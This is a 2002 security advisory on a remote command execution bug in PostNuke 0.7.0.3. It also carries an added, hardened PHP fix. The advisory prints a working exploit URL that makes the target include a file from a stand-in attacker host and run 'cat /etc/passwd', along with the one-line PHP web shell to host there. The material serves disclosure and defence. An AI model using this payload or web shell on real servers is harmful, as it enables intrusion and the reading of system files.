postnuke v 0.7.0.3 remote command execution

From: pokleyzz sakamaniaka (pokleyzzat_private)
Date: Wed Mar 27 2002 - 17:03:21 PST


    
    PostNuke is one of the popular content management systems
    written in PHP. There is a bug in the file user.php, line 107,
    through which a user can append their own values to the
    $caselist array.
    
    foreach ($caselist as $k=>$v)
    {
        $ModName = $v['module'];
        include "$v[path]/$k";
    }
    $caselist = array();
    
    http://lame_host/user.php?caselist[bad_file.txt][path]=http://bad_host&command=cat%20/etc/passwd
    
    bad_file.txt (put in bad_host document root):
    
    -- start bad_file.txt -----
    <pre>
    <?php 
    system($command);
    ?>
    -- end bad_file.txt -----
    
    Quick fix: put the following on line 28:

    $caselist = array();
    
    http://inetd-secure.net/
    http://www.mybsd.org.my/pokleyzz/
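
The quick fix works because, with register_globals enabled, request parameters are imported as global variables, so an uninitialised $caselist can be seeded from the query string before the loop runs. The following added example (not PostNuke code and not from the original post) keeps that initialisation and also validates each entry before it reaches include; resolve_case_file(), $moduleRoot and the modules/ layout are assumptions made for illustration.

```php
<?php
// Added example, not PostNuke code. resolve_case_file() and $moduleRoot are
// hypothetical names; the modules/ layout is an assumption.

// Return the canonical path of "$path/$file" only if it is an existing
// regular file under $moduleRoot; otherwise return null.
function resolve_case_file(string $moduleRoot, $path, $file): ?string
{
    if (!is_string($path) || !is_string($file)) {
        return null;                        // e.g. nested arrays or numeric keys
    }
    // Reject stream wrappers such as http://, ftp:// or php://.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $path)) {
        return null;
    }
    // The array key must be a bare PHP file name with no directory part.
    if (!preg_match('/^[A-Za-z0-9_\-]+\.php$/', $file)) {
        return null;
    }
    $root = realpath($moduleRoot);
    $full = realpath($path . '/' . $file);  // false if missing; resolves ../ and symlinks
    if ($root === false || $full === false || !is_file($full)) {
        return null;
    }
    // Containment check on the canonical paths.
    if (strncmp($full, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $full;
}

$moduleRoot = __DIR__ . '/modules';         // assumed layout
$caselist   = array();                      // the quick fix: start from an empty array

// ... application code fills $caselist here, from server-side data only ...

foreach ($caselist as $k => $v) {
    $full = is_array($v) ? resolve_case_file($moduleRoot, $v['path'] ?? null, $k) : null;
    if ($full === null) {
        error_log('rejected caselist entry: ' . json_encode(array($k, $v)));
        continue;
    }
    $ModName = $v['module'] ?? '';
    include $full;
}
$caselist = array();
```

Disabling register_globals and allow_url_fopen in php.ini removes the two PHP settings this bug depends on, independently of the code change.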
    


